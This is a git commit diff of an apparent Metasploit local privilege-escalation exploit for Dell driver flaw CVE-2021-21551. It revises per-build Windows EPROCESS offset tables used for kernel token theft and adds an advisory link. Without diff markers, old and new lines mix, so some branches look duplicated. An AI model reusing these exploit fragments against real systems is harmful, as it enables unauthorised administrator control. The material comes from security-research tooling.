Clear up some target offset discrepancies
This commit is contained in:
parent
7d841a0f79
commit
eb89550f85
Binary file not shown.
|
@ -36,35 +36,32 @@ BOOL ResolveRequirements(void) {
|
|||
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
|
||||
dwBuild = LOWORD(dwBuild);
|
||||
|
||||
/* Windows 7 SP0 */
|
||||
if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin7Sp0;
|
||||
}
|
||||
/* Windows 7 SP1 */
|
||||
else if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7601)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin7Sp1;
|
||||
}
|
||||
/* Windows 8.1 */
|
||||
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
|
||||
}
|
||||
/* Windows 10 */
|
||||
else if ((dwMajor == 10) && (dwMinor == 0)) {
|
||||
/* older than v1803 */
|
||||
if (dwBuild < 17134) {
|
||||
return FALSE;
|
||||
}
|
||||
/* v1803 - v1909*/
|
||||
else if (dwBuild < 19041) {
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
|
||||
}
|
||||
/* v2004 - v20H2 */
|
||||
else if (dwBuild < 19043) {
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17763)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 19041)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
|
||||
}
|
||||
else {
|
||||
return FALSE;
|
||||
}
|
||||
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
|
||||
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
|
||||
}
|
||||
else {
|
||||
return FALSE;
|
||||
|
|
|
@ -37,16 +37,24 @@ typedef struct _EPROCESS_OFFSETS {
|
|||
typedef EPROCESS_OFFSETS* PEPROCESS_OFFSETS;
|
||||
|
||||
#ifdef _WIN64
|
||||
/* Windows 7 SP0 (build 6.1.7600) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/RTM/_EPROCESS */
|
||||
/* Windows 7 SP0 (6.1.7600) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/RTM/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp0 = { 0x188, 0x208, 0x180 };
|
||||
/* Windows 7 SP1 (build 6.1.7601) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/SP1/_EPROCESS */
|
||||
/* Windows 7 SP1 (6.1.7601) - https://www.vergiliusproject.com/kernels/x64/Windows%207%20%7C%202008R2/SP1/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin7Sp1 = { 0x188, 0x208, 0x180 };
|
||||
/* Windows 8.1 (build: 6.3.9600) - https://www.vergiliusproject.com/kernels/x64/Windows%208.1%20%7C%202012R2/Update%201/_EPROCESS */
|
||||
/* Windows 8.1 (6.3.9600) - https://www.vergiliusproject.com/kernels/x64/Windows%208.1%20%7C%202012R2/Update%201/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
|
||||
/* Windows 10 v1803 - v1909 */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v2004 - v20H2 */
|
||||
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0 };
|
||||
/* Windows 10 v1903 (10.0.18362) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1903%2019H1%20(May%202019%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1903 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v1909 (10.0.18362) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1909 = { 0x2f0, 0x360, 0x2e8 };
|
||||
/* Windows 10 v2004 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2004 = { 0x448, 0x4b8, 0x440 };
|
||||
/* Windows 10 v2009 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
|
||||
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2009 = { 0x448, 0x4b8, 0x440 };
|
||||
#endif
|
||||
|
||||
/*
|
||||
|
|
|
@ -47,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2021-21551' ],
|
||||
[ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ]
|
||||
[ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
|
||||
[ 'URL', 'https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability' ],
|
||||
],
|
||||
'DisclosureDate' => '2021-05-04',
|
||||
'DefaultTarget' => 0,
|
||||
|
|
Loading…
Reference in New Issue